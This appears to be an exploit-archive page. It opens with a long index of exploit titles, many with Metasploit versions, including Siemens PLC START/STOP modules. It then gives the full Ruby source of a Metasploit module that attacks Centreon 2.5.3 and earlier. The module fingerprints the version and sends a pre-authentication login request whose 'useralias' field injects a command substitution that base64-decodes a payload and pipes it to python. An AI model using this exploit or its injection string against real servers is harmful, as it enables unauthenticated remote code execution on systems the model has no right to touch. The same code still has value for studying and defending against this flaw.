Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)

StoryBoard Quick 6 - Stack Buffer Overflow
StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)

phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection
phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit)

vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit
vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)

The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution
The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit)

Liferay XSL - Command Execution
Liferay XSL - Command Execution (Metasploit)

CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit
CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit (Metasploit)

Wyse - Machine Remote Power off (DOS) without any privilege
Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit)

TFM MMPlayer (m3u/ppl File) Buffer Overflow
TFM MMPlayer (.m3u/.ppl) Buffer Overflow

Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow
Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit)

WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal
WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal (Metasploit)

ALLMediaServer 0.8 SEH Overflow Exploit
ALLMediaServer 0.8 - SEH Overflow Exploit
Siemens Simatic S7-300/400 CPU START/STOP Module
Siemens Simatic S7-300 PLC Remote Memory Viewer
Siemens Simatic S7-1200 CPU START/STOP Module
Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit)
Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)
Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow
Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)

Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit
Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)

Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit
Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit)

NetWin SurgeFTP Authenticated Admin Command Injection
NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)

ActFax 5.01 - RAW Server Exploit
ActFax 5.01 - RAW Server Exploit (Metasploit)

Polycom HDX Telnet Authorization Bypass
Polycom HDX Telnet Authorization Bypass (Metasploit)

Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)
Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) (Metasploit)

Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution
Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)

Mikrotik Syslog Server for Windows 1.15 - Denial of Service
Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)

SAP ConfigServlet OS Command Execution
SAP ConfigServlet OS Command Execution (Metasploit)

SAP ConfigServlet Remote Unauthenticated Payload Execution
SAP ConfigServlet Remote Unauthenticated Payload Execution (Metasploit)

Microsoft Internet Explorer textNode Use-After-Free
Microsoft Internet Explorer textNode Use-After-Free (Metasploit)

Java Web Start Double Quote Injection Remote Code Execution
Java Web Start Double Quote Injection Remote Code Execution (Metasploit)

OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution
OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit)

Zabbix 2.0.8 - SQL Injection / Remote Code Execution
Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)

SikaBoom - Remote Buffer Overflow
SikaBoom - Remote Buffer Overflow (Metasploit)

Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass
Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit)

VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow (DEP Bypass)

Netgear WNR1000v3 - Password Recovery Credential Disclosure
Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)

Easy CD-DA Recorder - (PLS File) Buffer Overflow
Easy CD-DA Recorder - (.pls) Buffer Overflow

Fitnesse Wiki - Remote Command Execution
Fitnesse Wiki - Remote Command Execution (Metasploit)

EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read
EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)

AlienVault 4.5.0 - Authenticated SQL Injection
AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)

Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE
Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit)

F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation
F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)

AlienVault OSSIM 4.6.1 - Authenticated SQL Injection
AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)

Raritan PowerIQ 4.1.0 - SQL Injection
Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)

Mthree Development MP3 to WAV Decoder - (.mp3 File) Remote Buffer Overflow
Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow

ManageEngine Password Manager MetadataServlet.dat SQL Injection
ManageEngine Password Manager MetadataServlet.dat SQL Injection (Metasploit)

Ammyy Admin 3.5 - RCE
Ammyy Admin 3.5 - RCE (Metasploit)

Microsoft Exchange IIS HTTP Internal IP Address Disclosure
Microsoft Exchange IIS HTTP Internal IP Address Disclosure (Metasploit)

ManageEngine OpManager / Social IT Arbitrary File Upload
ManageEngine OpManager / Social IT Arbitrary File Upload (Metasploit)

DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload
DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)
Device42 WAN Emulator 2.3 - Traceroute Command Injection
Device42 WAN Emulator 2.3 - Ping Command Injection
Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)
Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)

Microsoft Windows Media Player 11.0.5721.5145 - (.avi File) Buffer Overflow
Microsoft Windows Media Player 11.0.5721.5145 - (.avi) Buffer Overflow

Varnish Cache CLI Interface - Remote Code Execution
Varnish Cache CLI Interface - Remote Code Execution (Metasploit)

Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE
Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE (Metasploit)

OpenMyZip 0.1 - (.zip File) Buffer Overflow
OpenMyZip 0.1 - (.zip) Buffer Overflow

Persistent Systems Client Automation - Command Injection RCE
Persistent Systems Client Automation - Command Injection RCE (Metasploit)

Metasploit Project < 4.11.1 - Initial User Creation CSRF
Metasploit Project < 4.11.1 - Initial User Creation CSRF (Metasploit)

Exim GHOST (glibc gethostbyname) Buffer Overflow
Exim GHOST (glibc gethostbyname) Buffer Overflow (Metasploit)
QNAP - Admin Shell via Bash Environment Variable Code Injection
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)

WordPress Business Intelligence Plugin - SQL injection
WordPress Business Intelligence Plugin - SQL injection (Metasploit)

Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit
Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)

PDF Shaper 3.5 - Buffer Overflow
PDF Shaper 3.5 - Buffer Overflow (Metasploit)

Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection
Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)

Centreon <= 2.5.3 - Remote Command Execution
Centreon 2.5.3 - Remote Command Execution

Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure (Metasploit)

Meteocontrol WEB’log - Admin Password Disclosure
Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)

VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)
VUPlayer 2.49 - (.m3u) Buffer Overflow Exploit (Win 7 DEP Bypass)
VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)
2016-07-28 05:03:16 +00:00


##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Centreon Web Useralias Command Execution',
        'Description' => %q(
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors. This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        ),
        'Author' =>
          [
            'h00die <mike@shorebreaksecurity.com>', # module
            'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
          ],
        'References' =>
          [
            [ 'EDB', '39501' ]
          ],
        'License' => MSF_LICENSE,
        'Platform' => ['python'],
        'Privileged' => false,
        'Arch' => ARCH_PYTHON,
        'Targets' =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Feb 26 2016'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'GET'
      )
      # No HTTP response at all: we cannot say anything about the version
      return Exploit::CheckCode::Unknown unless res

      # Pull the version string out of the login page footer
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
      if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def exploit
    begin
      vprint_status('Sending malicious login')
      send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'POST',
        'vars_post' =>
          {
            'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
            'password' => Rex::Text.rand_text_alpha(5)
          }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end